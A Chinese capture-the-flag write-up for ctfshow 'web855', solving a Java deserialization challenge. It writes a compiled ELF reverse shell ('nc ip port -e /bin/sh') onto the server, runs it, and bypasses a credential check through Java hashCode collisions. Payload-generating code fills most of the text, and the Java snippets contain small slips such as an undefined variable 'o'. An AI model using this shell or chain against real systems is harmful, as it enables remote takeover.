web855
得到源码后看到readObject里面有两条路可以走
1、写文件,文件名固定,文件内容开头固定后面内容可以通过write写入
2、执行命令,但是shellcodoe是不可控的(static)
如果两条路分开来看都没啥可利用的价值,但是放到一起就产生危害了。
可以看到他给的文件固定开头其实是一个elf可执行文件的文件头,也就是说我们可以写一个可执行程序。
接着如果执行shellcode命令则会给该文件一个权限并且执行。
可执行程序可以通过写一个c文件再gcc进行编译。
#include<stdlib.h>
int main() {
system("nc ip port -e /bin/sh");
return 0;
}
我们先来生成该恶意文件gcc a.c -o hack
,接着把文件的前四字节删掉(可以用010editor)
接着利用反序列化写入,前面有几个if,我们可以重写writeObject写入
private void writeObject(ObjectOutputStream out) throws Exception {
//将名字反转写入二进制流
out.writeInt(2135247942);
out.writeByte(1);
out.writeInt(0x36d);
File filename = new File("ser/hack"); //gcc生成的文件位置
BufferedInputStream in = new BufferedInputStream(new FileInputStream(filename));
ByteArrayOutputStream out2 = new ByteArrayOutputStream(1024);
byte[] temp = new byte[1024];
int size = 0;
while((size = in.read(temp)) != -1){
out2.write(temp, 0, size);
}
in.close();
byte[] content = out2.toByteArray();
out.write(content);
out.defaultWriteObject();
}
接着创建主类和main函数生成base64序列化串
package com.ctfshow.entity;
import java.io.*;
public class Main {
public static void main(String[] args)throws Exception {
User user = new User("123", "123");
ByteArrayOutputStream baos = new ByteArrayOutputStream();
ObjectOutputStream oos = new ObjectOutputStream(baos);
oos.writeObject(o);
String payload = new String(Base64.getEncoder().encode(baos.toByteArray()));
System.out.println(payload);
}
}
传入序列化串进行反序列化。
此时已经生成了恶意可执行程序,然后再执行shellcode。
有个比较关键的点需要绕过。
我们实例化时传入的username和password不能是ctfshow和123456,但是hash比较时又相等。
这个地方需要用到java里面的hash碰撞()
可以用如下代码生成
def hashcode(val):
h=0
for i in range(len(val)):
h=31 * h + ord(val[i])
return h
t="ct"
#t="12"
for k in range(1,128):
for l in range(1,128):
if t!=(chr(k)+chr(l)):
if(hashcode(t)==hashcode(chr(k)+chr(l))):
print(t,chr(k)+chr(l))
得到
ct,dU
12,0Q
可以用dU代替ct,0Q代替12
private void writeObject(ObjectOutputStream out) throws Exception {
out.writeInt(2135247942);
out.writeByte(2);
out.defaultWriteObject();
}
package com.ctfshow.entity;
import java.io.*;
public class Main {
public static void main(String[] args)throws Exception {
User user = new User("dUfshow", "0Q3456");
ByteArrayOutputStream baos = new ByteArrayOutputStream();
ObjectOutputStream oos = new ObjectOutputStream(baos);
oos.writeObject(o);
String payload = new String(Base64.getEncoder().encode(baos.toByteArray()));
System.out.println(payload);
}
}